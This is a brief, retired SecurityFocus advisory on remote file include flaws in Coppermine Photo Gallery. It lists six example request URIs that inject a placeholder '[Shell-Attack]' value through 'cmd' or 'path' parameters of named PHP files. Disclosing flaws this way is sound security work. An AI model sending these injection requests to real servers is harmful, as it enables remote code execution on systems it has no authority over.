Retired: Coppermine Photo Gallery Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit this issue.

Example URIs have been provided:

http://www.example.com/Script_Path/image_processor.php?cmd=[Shell-Attack]
http://www.example.com/Script_Path/include/functions.php?path=[Shell-Attack]
http://www.example.com/Script_Path/include/picmgmt.inc.php?cmd=[Shell-Attack]
http://www.example.com/Script_Path/include/plugin_api.inc.php?path=[Shell-Attack]
http://www.example.com/Script_Path/index.php?path=[Shell-Attack]
http://www.example.com/Script_Path/pluginmgr.php?path=[Shell-Attack]


 

Privacy Statement
Copyright 2010, SecurityFocus